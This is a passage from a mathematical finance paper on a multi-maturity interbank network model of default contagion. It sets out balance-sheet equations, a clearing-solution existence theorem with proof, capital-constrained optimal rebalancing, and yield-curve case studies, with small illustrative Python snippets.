As in the single maturity setting, for consideration of the capital account, the interbank assets will not be valued at their face value, but rather based on the probability of default (i.e., to distinguish the book value and the realized value).
That is, the obligation at time $t_k$ from bank $j$ to $i$ is valued as $p_{ji}(t_l,t_k) := e^{-r(t_k-t_l)}L_{ji}^k(\beta + (1-\beta)\mathbb{E}[P_j(t_k,t_k) \; | \; \mathcal{F}_{t_l}]) \in \mathcal{L}_{t_l}$ that takes value (almost surely) in the interval $e^{-r(t_k-t_l)}L_{ji}^k\times[\beta,1]$ where $P_j(t_k,t_k,\omega_{t_k})$ is the realized indicator of solvency for bank $j$ at time $t_k$. Defining $P_j(t,t_k) := \mathbb{E}[P_j(t_k,t_k) \; | \; \mathcal{F}_t] \in \mathcal{L}_t$ as the (conditional) probability of solvency for obligations with maturity at time $t_k$ as measured at time $t$, we can write the discounted payments as $p_{ji}(t_l,t_k) = e^{-r(t_k-t_l)}L_{ji}^k (\beta+(1-\beta)P_j(t_l,t_k))$. Thus, the realized balance sheet for bank $i$ has possible write-downs in the value of assets and, therefore, the realized net worth at time $t_l$ is given by
\begin{align*}
K_i(t_l) = V_i&(t_l) + \beta\sum_{j = 1}^n L_{ji}^l \ind{j \text{ defaults at } t_l}\\
&+ \sum_{k = l+1}^\ell e^{-r(t_k-t_l)} \sum_{j = 0}^n [L_{ji}^k (\beta + (1-\beta)P_j(t_l,t_k))\ind{j \text{ did not default before } t_l} - L_{ij}^k].
\end{align*}
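As a small numerical illustration of the marked value $p_{ji}(t_l,t_k)$, the following hedged sketch discounts the face value at the risk-free rate and blends the recovery rate $\beta$ with full payment using the conditional survival probability; the function name is our own.

```python
import math

def marked_claim_value(L, beta, P_surv, r, t_now, t_mat):
    """Time-t_now value of a face value L due at t_mat, blending the
    recovery beta with full payment via the conditional survival
    probability P_surv = P_j(t_now, t_mat)."""
    return math.exp(-r * (t_mat - t_now)) * L * (beta + (1.0 - beta) * P_surv)
```

As noted above, the resulting value always lies in $e^{-r(t_k-t_l)}L_{ji}^k\times[\beta,1]$.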
\begin{remark}
Recall from Remark~\ref{rem:nonmarketable} that throughout this work we assume that the interbank network is fixed. As such, even though future interbank assets have a value determined by $\vec{P}$, these assets are treated as nonmarketable and cannot be used to increase short-term liquidity as encoded in the cash account. Notably, ignoring the effects of changing the network structure, if these interbank assets were treated as both liquid and marketable then the cash account $\vec{V}$ would be identical to $\vec{K}$.
\end{remark}
As previously mentioned, as opposed to the single maturity setting, herein a default can be due to either insolvency (if the bank's net worth drops below 0 so that, e.g., either shareholders are able to increase their risk-neutral value by declaring bankruptcy or some covenants have forced the early default) or illiquidity (if the bank cannot meet its obligations with its current cash account). That is, bank $i$ will default at the stopping time $\tau_i$ given by
\begin{equation*}
\tau_i := \inf\{t \geq 0 \; | \; \min\{K_i(t) \; , \; V_i(t)\} < 0\}
\end{equation*}
so that default occurs at the first time that either the realized capital or cash account become negative.
This default condition was studied in~\cite{BBF18} in a different dynamic network context.
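The default time can be evaluated path-by-path as the first date at which either account turns negative; the sketch below is illustrative (names are our own, and the no-default value $T+1$ is passed in explicitly to encode the convention used herein).

```python
def default_time(times, K_path, V_path, no_default_value):
    """First date at which min(K, V) < 0 on a single realized path;
    returns ``no_default_value`` (the T + 1 convention) otherwise."""
    for t, K, V in zip(times, K_path, V_path):
        if min(K, V) < 0.0:
            return t
    return no_default_value
```

For example, a bank that remains solvent (positive capital) but becomes illiquid defaults at the first date its cash account goes negative: on the path $K = (1.0, 0.8, 0.6)$, $V = (0.5, 0.1, -0.2)$ over $t \in \{0, 0.5, 1\}$, the default time is $1$.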
\begin{remark}\label{rem:illiquid2}
As in Remark~\ref{rem:literature}\eqref{rem:illiquid}, if only the modeling of illiquidity is desired then the default time can be reformulated such that it only accounts for the cash account, i.e., $\tau_i = \inf\{t \geq 0 \; | \; V_i(t) < 0\}$.
\end{remark}
\begin{remark}\label{rem:alpha}
Consider the following three meaningful levels of the rebalancing parameter $\alpha_i$:
\begin{itemize}
\item If $\alpha_i^0(t_l) := 0$ then bank $i$ will reinvest its entire cash account into the external asset $x_i$ at time $t_l$.
\item If $\alpha_i^1(t_l) := 1$ then bank $i$ will move all of its investments into the risk-free bond at time $t_l$; this includes any prior investment in the external asset $x_i$. Though this is feasible in our setting, we generally consider this to be an extreme scenario.
\item If
\begin{align*}
\alpha_i^L(t_l) &:= \left[\frac{\sum_{k = 0}^l e^{r(t_l-t_k)} \sum_{j = 0}^n [L_{ji}^k\ind{\tau_j > t_k}+\beta\sum_{h = k}^\ell e^{-r(t_h-t_k)}L_{ji}^h \ind{\tau_j = t_k}-L_{ij}^k]}{V_i(t_l)+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_l}}\right]^+\\
&= \left[1 - \frac{x_i(t_l)}{V_i(t_l)+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_l}}\right]^+
\end{align*}
then bank $i$ will use its (risky) external asset position to cover any realized net liabilities, but will never increase its external position above its original level (i.e., if bank $i$ has net interbank assets, the external asset position will be made whole and all additional assets are invested in cash). Notably, if bank $i$ is solvent, this rebalancing parameter falls between the prior two cases, i.e., $\alpha_i^L(t_l) \in [0,1]$.
\end{itemize}
If $\alpha_i(t_l) < 0$ then, implicitly, bank $i$ is shorting its own external assets; by a no-short selling constraint, we assume this cannot occur.
If $\alpha_i(t_l) > 1$ then, similarly, bank $i$ is borrowing at the risk-free rate solely to purchase additional units of the risky asset; as this would produce new obligations, study of such a scenario is beyond the scope of this work.
\end{remark}
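Using the simplified second expression for $\alpha_i^L(t_l)$ above, this rebalancing level can be sketched as follows. The treatment of a nonpositive denominator (returning $0$) is our own convention for the illustration, as the remark only considers solvent banks.

```python
def alpha_L(x_now, V_now, recovery_now):
    """Hold the external asset position at its current level x_now and park
    any surplus cash in the risk-free bond; clipped at 0 (no short selling)."""
    available = V_now + recovery_now
    if available <= 0.0:
        return 0.0  # our convention: no cash available to allocate
    return max(0.0, 1.0 - x_now / available)
```

If the available cash ($1.5$) exceeds the external position ($1.0$), the surplus is parked in the bond so that $\alpha^L = 1 - 1/1.5 = 1/3$; if the external position exceeds the available cash, then $\alpha^L = 0$.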
\subsection{Mathematical model}\label{sec:Kmaturity-model}
As highlighted within the balance sheet modeling, we can immediately define an equilibrium model for default contagion that is jointly on the net worths ($\vec{K} = (K_1,...,K_n)^\top$), cash accounts ($\vec{V} = (V_1,...,V_n)^\top$), survival probabilities ($\vec{P} = (P_1,...,P_n)^\top$), and default times ($\boldsymbol{\tau} = (\tau_1,...,\tau_n)^\top$). As in the single maturity setting, by convention and without loss of generality we will assume $\tau_i(\omega) = T+1$ if bank $i$ does not default on $\omega \in \Omega$.
In contrast to the single maturity setting, we consider the simpler domain $\mathbb{D} := \prod_{l = 0}^\ell (\mathcal{L}_{t_l}^n \times \mathcal{L}_{t_l}^n \times [\vec{0},\vec{1}]^{|\Omega_{t_l}| \times (\ell-l+1)} \times \{t_0,t_1,...,t_\ell,T+1\}^{|\Omega| \times n})$. That is, we specify $\vec{K},\vec{V}$ are adapted processes, $\vec{P}$ is a collection of adapted processes between 0 and 1, and $\boldsymbol{\tau}$ is a vector of stopping times for this model.
This clearing system $\Psi: \mathbb{D} \to \mathbb{D}$ is mathematically constructed in~\eqref{eq:Kmaturity} with an explicit dependence on the rebalancing parameter $\boldsymbol{\alpha}$:
\begin{align}
\label{eq:Kmaturity} &(\vec{K},\vec{V},\vec{P},\boldsymbol{\tau}) = \Psi(\vec{K},\vec{V},\vec{P},\boldsymbol{\tau};\boldsymbol{\alpha}) \\
\nonumber &\qquad := (\Psi_{\vec{K}}(t_l,\vec{V}(t_l),\vec{P}(t_l,\cdot),\boldsymbol{\tau}) \; , \; \Psi_{\vec{V}}(t_l,\vec{V}(t_{[l-1]\vee 0}),\boldsymbol{\tau};\boldsymbol{\alpha}) \; , \; \Psi_{\vec{P}}(t_l,t_k,\boldsymbol{\tau})_{k = [l+1]\wedge\ell}^{\ell} \; , \; \Psi_{\boldsymbol{\tau}}(\vec{K},\vec{V}))_{l = 0}^{\ell}
\end{align}
where, for any $i = 1,...,n$,
\begin{equation*}
\begin{cases}
\Psi_{\vec{K},i}(t_l,\tilde\vec{V},\tilde\vec{P},\boldsymbol{\tau}) = \tilde V_i + \beta\sum_{j = 1}^n L_{ji}^l\ind{\tau_j = t_l} + \sum_{k = l+1}^{\ell} e^{-r(t_k-t_l)} \sum_{j = 0}^n \left[L_{ji}^k (\beta + (1-\beta)\tilde P_j(t_k))\ind{\tau_j \geq t_l} - L_{ij}^k\right] \\
\Psi_{\vec{V},i}(t_l,\tilde\vec{V},\boldsymbol{\tau};\boldsymbol{\alpha}) = \begin{cases} \begin{array}{l} [1 + R_i(t_l,\alpha_i(t_{l-1}))]\left(\tilde V_i + \beta\sum_{k = l-1}^\ell e^{-r(t_k-t_{l-1})}\sum_{j = 1}^n L_{ji}^k\ind{\tau_j = t_{l-1}}\right) \\ \quad + \sum_{j = 0}^n \left[L_{ji}^l \ind{\tau_j > t_l} - L_{ij}^l\right] \end{array} & \text{if } l > 0 \\ x_i(0) & \text{if } l = 0 \end{cases} \\
\Psi_{\vec{P},i}(t_l,t_k,\boldsymbol{\tau}) = \P(\tau_i > t_k \; | \; \mathcal{F}_{t_l}) \\
\Psi_{\boldsymbol{\tau},i}(\vec{K},\vec{V}) = \inf\{t \geq 0 \; | \; \min\{K_i(t),V_i(t)\} < 0\}.
\end{cases}
\end{equation*}
In comparison to the single maturity setting considered in Section~\ref{sec:1maturity} above, due to the recovery rate $\beta$ and the potential dependence of the rebalancing strategy on the capital and cash accounts (see, for instance, $\boldsymbol{\alpha}^L$ in Remark~\ref{rem:alpha}), we can no longer guarantee monotonicity of the clearing problem. However, as will be demonstrated in Theorem~\ref{thm:Kmaturity-exist} below, we will prove the existence of a clearing solution constructively using an extension of the dynamic programming principle formulation of the problem (as in Section~\ref{sec:1maturity-dpp} for the single maturity setting). This, additionally, allows us to immediately conclude that we can construct a Markovian clearing solution.
\begin{theorem}\label{thm:Kmaturity-exist}
Fix the rebalancing strategies $\boldsymbol{\alpha}(t_l,\hat\vec{K},\hat\vec{V}) \in [\vec{0},\vec{1}]^{|\Omega_{t_l}|}$ so that they depend only on the current time $t_l$, capital $\hat\vec{K} \in \mathcal{L}_{t_l}^n$, and cash account $\hat\vec{V} \in \mathcal{L}_{t_l}^n$.
There exists a (finite) clearing solution $(\vec{K}^*,\vec{V}^*,\vec{P}^*,\boldsymbol{\tau}^*) = \Psi(\vec{K}^*,\vec{V}^*,\vec{P}^*,\boldsymbol{\tau}^*)$ to~\eqref{eq:Kmaturity}.
Furthermore, if we have Markovian external assets, $\vec{x}(t_l) = f(\vec{x}(t_{l-1}),\tilde\epsilon(t_l))$ for i.i.d.\ perturbations $\tilde\epsilon$, then there exists a clearing solution such that $(\vec{x}(t_l),\vec{K}^*(t_l),\vec{V}^*(t_l),\vec{P}^*(t_l,t_k)_{k = l}^\ell,\boldsymbol{\iota}^*(t_l))_{l = 0}^\ell$ is Markovian where $\boldsymbol{\iota}^*(t_l) := \ind{\boldsymbol{\tau}^* \geq t_l}$ is the realized solvency process.
\end{theorem}
\begin{proof}
We will prove the existence of a clearing solution $(\vec{K}^*,\vec{V}^*,\vec{P}^*,\boldsymbol{\tau}^*)$ to~\eqref{eq:Kmaturity} constructively. Specifically, as in the dynamic programming principle formulation~\eqref{eq:1maturity-dpp} for the single maturity setting, consider the mapping $\hat\Psi$ of the time, the prior capital and cash accounts, and the set of solvent institutions into the current clearing solution. That is, we define $\hat\Psi$ by
\begin{align*}
&\hat\Psi(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) := \left(\begin{array}{c}\hat\Psi_{\vec{K}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) \\ \hat\Psi_{\vec{V}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) \\ \hat\Psi_{\vec{P}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota})\end{array}\right) \\
\nonumber &=
\FIX_{(\tilde\vec{K},\tilde\vec{V},\tilde\vec{P}) \in \hat\mathbb{D}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota})} \left(\begin{array}{l}
\begin{array}{l} \tilde\vec{V} + \beta(\vec{L}^l)^\top\diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} < \vec{0}}\\ \qquad + \sum\limits_{k = l+1}^\ell e^{-r(t_k-t_l)} \left[(\vec{L}^k)^\top\diag{\boldsymbol{\iota}}(\beta\vec{1} + (1-\beta)\tilde\vec{P}(t_k)) - \vec{L}^k \vec{1}\right] \end{array} \\
\begin{cases} (I + \diag{\vec{R}(t_l,\boldsymbol{\alpha}(t_{l-1},\hat\vec{K},\hat\vec{V}))})\hat\vec{V} + (\vec{L}^l)^\top\diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} \geq \vec{0}} - \vec{L}^l\vec{1} &\text{if } l > 0 \\ \vec{x}(0) &\text{if } l = 0 \end{cases} \\
\left(\begin{cases}
\left[\sum\limits_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}})\hat\Psi_{\vec{P},t_k}(t_{l+1},\vec{F}_l(\tilde\vec{K},\tilde\vec{V},\boldsymbol{\iota})(\omega_{t_l}))(\omega_{t_{l+1}})}{\P(\omega_{t_l})}\right]_{\omega_{t_l} \in \Omega_{t_l}} &\text{if } l < k \\
\diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} \geq \vec{0}} &\text{if } l = k
\end{cases}\right)_{k = l}^{\ell}
\end{array}\right)
\end{align*}
with \[\vec{F}_l(\tilde\vec{K},\tilde\vec{V},\boldsymbol{\iota}) := \left(\tilde\vec{K} \, , \, \tilde\vec{V} + \beta\sum_{k = l}^{\ell} (\vec{L}^k)^\top\diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} < \vec{0}} \, , \, \diag{\boldsymbol{\iota}}\ind{\tilde\vec{K}\wedge\tilde\vec{V} \geq \vec{0}}\right)\]
for any $l = 0,1,...,\ell$ and the fixed points taken on the lattice
\begin{align*}
\hat\mathbb{D}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) &:= \mathbb{D}_{\vec{K}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) \times \mathbb{D}_{\vec{V}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) \times [\vec{0},\vec{1}]^{|\Omega_{t_l}| \times (\ell-l+1)} \\
\mathbb{D}_{\vec{K}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) &:= \left\{\vec{K} \in \mathcal{L}_{t_l}^n \; \left| \; \vec{K} \in \mathbb{D}_{\vec{V}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) + [\vec{0},\beta(\vec{L}^l)^\top\boldsymbol{\iota}] + \sum_{k = l+1}^\ell e^{-r(t_k-t_l)} ([\beta(\vec{L}^k)^\top\boldsymbol{\iota},(\vec{L}^k)^\top\boldsymbol{\iota}] - \vec{L}^k\vec{1}) \right.\right\} \\
\mathbb{D}_{\vec{V}}(t_l,\hat\vec{K},\hat\vec{V},\boldsymbol{\iota}) &:= \begin{cases}
\left\{\vec{V} \in \mathcal{L}_{t_l}^n \; \left| \; \vec{V} \in (I+\diag{\vec{R}(t_l,\boldsymbol{\alpha}(t_{l-1},\hat\vec{K},\hat\vec{V}))})\hat\vec{V} + [\vec{0},(\vec{L}^l)^\top\boldsymbol{\iota}] - \vec{L}^l\vec{1}\right.\right\} &\text{if } l > 0 \\
\{\vec{x}(0)\} &\text{if } l = 0. \end{cases}
\end{align*}
As the problem used to define $\hat\Psi$ is a monotonic mapping on a lattice (proven by inspection for $\hat\Psi_{\vec{K}},\hat\Psi_{\vec{V}}$ and by a simple induction argument for $\hat\Psi_{\vec{P}}$), we can apply Tarski's fixed point theorem to guarantee the existence of a greatest fixed point (i.e., the mapping $\FIX$ is well-defined in this case for every feasible combination of inputs).
Let $(\vec{K}^*,\vec{V}^*,\vec{P}^*)$ be the realized solution from $\hat\Psi(0,\vec{0},\vec{x}(0),\vec{1})$ and define $\boldsymbol{\tau}^* := \Psi_{\boldsymbol{\tau}}(\vec{K}^*,\vec{V}^*)$. (We wish to note that the initial value for $\hat\vec{K}$, taken here as $\vec{0}$, is an arbitrary choice as this term is never utilized.)
As in the proof of Proposition~\ref{prop:1maturity-dpp}, we will seek to demonstrate that $(\vec{K}^*,\vec{V}^*,\vec{P}^*,\boldsymbol{\tau}^*)$ is a fixed point to~\eqref{eq:Kmaturity} by proving that $\vec{P}^*(t_l,t_k) = \Psi_{\vec{P}}(t_l,t_k,\boldsymbol{\tau}^*)$ for all times $t_l \leq t_k$.
First, at maturity times, $\vec{P}^*(t_l,t_l) = \prod_{k = 0}^l \ind{\min\{\vec{K}^*(t_k),\vec{V}^*(t_k)\} \geq 0} = \ind{\boldsymbol{\tau}^* > t_l} = \P(\boldsymbol{\tau}^* > t_l | \mathcal{F}_{t_l})$ by construction.
Second, consider $l < k$ and assume $\vec{P}^*(t_{l+1},t_k) = \Psi_{\vec{P}}(t_{l+1},t_k,\boldsymbol{\tau}^*)$. By definition of $\hat\Psi_{\vec{P},t_k}$, we can construct $\vec{P}^*(t_l,t_k)$ as follows:
\begin{align*}
P_i^*(t_l,t_k,\omega_{t_l}) &= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \hat\Psi_{\vec{P},t_k,i}(t_{l+1},\vec{K}^*(t_l),\vec{V}^*(t_l)+\beta\sum_{k=l}^\ell(\vec{L}^k)^\top\ind{\boldsymbol{\tau}^* = t_l},\ind{\boldsymbol{\tau}^* > t_l})(\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) P_i^*(t_{l+1},t_k,\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \Psi_{\vec{P},i}(t_{l+1},t_k,\boldsymbol{\tau}^*)(\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\omega_{t_{l+1}}) \P(\tau_i^* > t_k | \mathcal{F}_{t_{l+1}})(\omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \sum_{\omega_{t_{l+1}} \in \succ(\omega_{t_l})} \frac{\P(\tau_i^* > t_k , \omega_{t_{l+1}})}{\P(\omega_{t_l})} \\
&= \P(\tau_i^* > t_k | \mathcal{F}_{t_l})(\omega_{t_l}) = \Psi_{\vec{P},i}(t_l,t_k,\boldsymbol{\tau}^*)(\omega_{t_l}).
\end{align*}
Therefore, we have constructed a process that clears~\eqref{eq:Kmaturity}. To prove that the enlarged process is Markovian, as in Lemma~\ref{lemma:markov}, we can simply observe that
\begin{align*}
&(\vec{K}^*(t_l),\vec{V}^*(t_l),\vec{P}^*(t_l,t_k)_{k = l}^\ell) = \hat\Psi(t_l,\boldsymbol{\iota}^*(t_l),\vec{V}^*(t_{l-1});\vec{x}(t_l)) \\ &\qquad \qquad= \hat\Psi(t_l,\diag{\boldsymbol{\iota}^*(t_{l-1})}\ind{\vec{K}^*(t_{l-1})\wedge\vec{V}^*(t_{l-1}) \geq \vec{0}},\vec{V}^*(t_{l-1});f(\vec{x}(t_{l-1}),\tilde\epsilon(t_l))).
\end{align*}
From this, the result is immediate.
\end{proof}
\subsection{Optimal rebalancing}\label{sec:Kmaturity-opt}
Thus far, we have assumed that the rebalancing strategies $\boldsymbol{\alpha}$ are known and fixed solely based on the composition of the cash account. However, in practice, the banks will seek to optimize their own strategy $\alpha_i$ so as to maximize their utility subject to certain regulatory constraints.
In particular, herein, we will consider the setting in which banks must satisfy a short-term capital adequacy constraint at each time point $t_l$ for $l = 0,1,...,\ell-1$.
This regulatory requirement, imposed by the Basel accords, is such that the ratio of the capital to the risk-weighted assets needs to exceed some minimal ratio. That is, assuming the risk-weights for the risk-free and all interbank assets are 0, $\alpha_i(t_l) \in [0,1]^{|\Omega_{t_l}|}$ is constrained such that
\[\frac{K_i(t_l)}{w_i(1-\alpha_i(t_l))(V_i(t_l)+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_{l-1}})} \geq \theta\]
for risk-weight $w_i > 0$ and minimal threshold $\theta > 0$.
(As banks only rebalance when they are solvent, we can assume without loss of generality that $K_i(t_l),V_i(t_l) \geq 0$.)
That is, assuming bank $i$ is solvent at time $t_l$, bank $i$ is bounded on its investment in its external assets by
\[\alpha_i(t_l) \geq 1 - \frac{K_i(t_l)}{w_i\theta (V_i(t_l)+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_{l-1}})}.\]
We wish to note that $\alpha_i(t_l) \leq 1$ holds automatically so long as bank $i$ is solvent and this capital ratio constraint is satisfied.
Under this regulatory setting, bank $i$ aims to optimize:
\begin{align}\label{eq:Kmaturity-opt}
\alpha_i^*(t_l,\omega_{t_l}) &= \argmax_{\alpha_i \in [0,1]} \left\{U_i(\alpha_i;t_l,\omega_{t_l}) \; | \; \alpha_i \geq 1 - \frac{K_i(t_l,\omega_{t_l})}{w_i\theta (V_i(t_l,\omega_{t_l})+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_{l-1}}(\omega_{t_l}))}\right\}
\end{align}
for some quasiconcave utility function $U_i: [0,1] \to \mathbb{R}$ (which may also depend on the time and current state of the external market) at every time $t_l$ and state $\omega_{t_l} \in \Omega_{t_l}$.
\begin{example}\label{ex:Kmaturity-opt}
Assume bank $i$'s utility $U_i$ is nondecreasing in its investment in its risky (external) asset, i.e., nonincreasing in $\alpha_i$. Then~\eqref{eq:Kmaturity-opt} can trivially be solved in closed form, i.e.,
\[\alpha_i^*(t_l,\omega_{t_l}) = \left[1 - \frac{K_i(t_l,\omega_{t_l})}{w_i \theta (V_i(t_l,\omega_{t_l})+\beta\sum_{k = l}^\ell e^{-r(t_k-t_l)}\sum_{j = 1}^n L_{ji}^k \ind{\tau_j = t_{l-1}}(\omega_{t_l}))}\right]^+\]
at every time $t_l$ and state $\omega_{t_l} \in \Omega_{t_l}$.
The monotonicity of the utility function is natural for two (overlapping) reasons. First, as portfolio managers are rewarded for high returns but have only limited costs on the downside, they are incentivized to take outsized risks; that is, a portfolio manager would attempt to invest as much as allowed in the risky asset. Second, as we assume the dynamics of the external assets are independent of the investments made, this can be viewed as the ``ideal'' portfolio for bank $i$; as such, the bank would seek to invest as much as possible into this risky position. In either case, the result for bank $i$ is a utility function that is nonincreasing in $\alpha_i$.
\end{example}
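The closed-form optimizer of this example can be sketched directly; the function name is our own, and the recovery term in the denominator is passed in as a single precomputed number.

```python
def alpha_star(K, V, recovery, w, theta):
    """Minimal risk-free holding satisfying the capital adequacy constraint
    K / (w (1 - alpha) (V + recovery)) >= theta, i.e. the closed form
    alpha* = [1 - K / (w * theta * (V + recovery))]^+ from the example."""
    return max(0.0, 1.0 - K / (w * theta * (V + recovery)))
```

With the Basel-style parameters $w = 2$ and $\theta = 0.08$ used in the case studies below, a solvent bank with $K = 0.1$, $V = 1$, and no recoveries obtains $\alpha^* = 1 - 0.1/0.16 = 0.375$.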
\subsection{Case studies}\label{sec:Kmaturity-cs}
As in Section~\ref{sec:1maturity-cs}, for the purposes of these case studies, we will consider the tree model $(\Omega^n,\mathcal{F}^n,(\mathcal{F}_{l\Delta t}^n)_{l = 0}^{T/\Delta t},\P^n)$ as constructed in~\cite{he1990convergence} and replicated in Section~\ref{sec:setting-tree}. Likewise, we will assume that the external assets follow the geometric random walk~\eqref{eq:gbm}.
Furthermore, we will assume the Gai--Kapadia setting (\cite{GK10}) in which there is a zero recovery rate $\beta = 0$.
We will consider three primary case studies within this section to demonstrate the impacts of financial contagion on the term structure of bank debt. We define the term structure or yield curve of bank debt at time $t = 0$ through the interest rates $R_i^*(t_l) = P_i(0,t_l)^{-1/t_l}-1$ so that $(1+R_i^*(t_l))^{t_l} = 1/P_i(0,t_l)$.
First, we will present a sample yield curve (as measured at time $0$) under varying investment strategies $\boldsymbol{\alpha}$.
Second, we will vary the leverage of the banks in the system in order to investigate the sensitivity of this systemic term structure to the initial balance sheet of the banks.
Third, we will investigate a core-periphery network model to study a larger system and examine the impacts of localized stresses on its term structure.
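The implied yields used throughout these case studies follow directly from the definition $R_i^*(t_l) = P_i(0,t_l)^{-1/t_l}-1$; a minimal sketch:

```python
def implied_yield(P0t, t):
    """Annualized yield implied by the time-0 survival probability P(0, t),
    i.e. the rate R* with (1 + R*)^t = 1 / P(0, t)."""
    return P0t ** (-1.0 / t) - 1.0
```

A survival probability of $99\%$ at $t = 1$ corresponds to a yield of roughly $1.01\%$, while the same survival probability at $t = 0.5$ corresponds to roughly $2.03\%$, illustrating how short-dated distress inflates short-term rates.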
\begin{remark}
All clearing solutions computed herein are found via the Picard iteration of~\eqref{eq:Kmaturity} beginning from the assumption that no banks will ever default. That is, these computations are accomplished without application of the constructive dynamic programming approach presented in the proof of Theorem~\ref{thm:Kmaturity-exist}. As this process converged for all examples considered in this work, we suspect that the monotonicity of~\eqref{eq:Kmaturity} may be stronger than what could be proven herein (which would provide, e.g., a guarantee of the existence of a maximal clearing solution).
\end{remark}
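The Picard iteration described in this remark can be sketched generically: starting from the optimistic no-default guess, repeatedly apply the clearing map until successive iterates agree. Here \texttt{Psi} is an arbitrary callable standing in for a finite-dimensional encoding of~\eqref{eq:Kmaturity}; the tolerance and iteration cap are our own choices.

```python
def picard_fixed_point(Psi, z0, tol=1e-12, max_iter=10_000):
    """Iterate z <- Psi(z) from the initial guess z0 until successive
    iterates agree to within tol (component-wise)."""
    z = tuple(z0)
    for _ in range(max_iter):
        z_next = tuple(Psi(z))
        if max(abs(a - b) for a, b in zip(z_next, z)) < tol:
            return z_next
        z = z_next
    raise RuntimeError("Picard iteration did not converge")
```

For the clearing problem, $z_0$ would encode the no-default guess ($\vec{P} \equiv \vec{1}$ and the corresponding accounts); as noted, convergence was observed empirically but is not guaranteed by the results proven herein.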
\subsubsection{Systemic term structure and investment strategies}\label{sec:Kmaturity-cs-term}
First, we want to consider the yield curve (as measured at time $t = 0$) under the network valuation adjustment under varying investment strategies. Specifically, we will consider the same $n = 2$ network as in Section~\ref{sec:1maturity-cs-path} but where all obligations $\vec{L}_0$ are split randomly (uniformly) over $(t_l)_{l = 1}^\ell$. Due to the random split of obligations over time, the banks in this example are no longer symmetric institutions. We consider only a single split of the obligations as the purpose of this case study is to understand the possible shapes of the term structure under varying rebalancing strategies $\boldsymbol{\alpha}$. In particular, we will study three meaningful rebalancing structures: all investments are made in the external asset only ($\boldsymbol{\alpha}^0$ as provided in Remark~\ref{rem:alpha}), all surplus interbank payments are held in the risk-free asset ($\boldsymbol{\alpha}^L$ as defined in Remark~\ref{rem:alpha}), and the optimal investment strategy ($\boldsymbol{\alpha}^*$ as given in Example~\ref{ex:Kmaturity-opt} with risk-weight $w_i = 2$ for $i \in \{1,2\}$ and threshold $\theta = 0.08$ to match the Basel II Accords).
\begin{figure}[h]
\centering
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankTerm-alpha-1.eps}
\caption{Bank $1$}
\label{fig:term-1}
\end{subfigure}
~
\begin{subfigure}[t]{0.45\textwidth}
\centering
\includegraphics[width=\textwidth]{2bankTerm-alpha-2.eps}
\caption{Bank $2$}
\label{fig:term-2}
\end{subfigure}
\caption{Section~\ref{sec:Kmaturity-cs-term}: The term structure for banks $1$ and $2$ for varying investment strategies $\alpha$.}
\label{fig:term}
\end{figure}
Figure~\ref{fig:term} displays the systemic term structure for both banks in this system. Notably, though these interest rates are similar for the two institutions, they are not identical due to the aforementioned random splitting of the obligations over the 10 time periods.
We would also like to highlight that the yield curve for both banks has an inverted shape, i.e., the interest rate for longer dated maturities is lower than some short-term obligations. Inverted yield curves are typically seen as precursors of economic distress; here the probabilities of default are largely driven by contagion as, e.g., bank $1$ will never default so long as bank $2$ makes all of its payments in full (bank $2$ will default in fewer than 0.7\% of paths under all three investment strategies if bank $1$ pays in full).
Comparing the different investment strategies makes clear that $\boldsymbol{\alpha}^L$ is the least risky strategy, i.e., its interest rates are dominated by those of $\boldsymbol{\alpha}^0$ and $\boldsymbol{\alpha}^*$. This is as expected: so long as the bank is healthy, it holds all surplus assets in the risk-free asset; otherwise it draws down its cash account to pay off obligations.
Surprisingly, however, $\boldsymbol{\alpha}^*$ results in higher equilibrium interest rates than $\boldsymbol{\alpha}^0$. That is, imposing a regulatory constraint on investments through $\boldsymbol{\alpha}^*$ leads to greater probabilities of default than solely investing in the risky (external) asset $\boldsymbol{\alpha}^0$. Though, naively, it may seem counterintuitive that the most volatile investing strategy ($\boldsymbol{\alpha}^0$) is \emph{not} the riskiest ex post, we conjecture this is due to the pro-cyclicality of the capital adequacy requirement (see also, e.g.,~\cite{banerjee2021price}).
Specifically, when ignoring the possibility of counterparty risks (i.e., assuming all interbank assets are fulfilled in full) bank $2$ defaults under more scenarios when both banks follow $\boldsymbol{\alpha}^0$ than when they follow $\boldsymbol{\alpha}^*$.
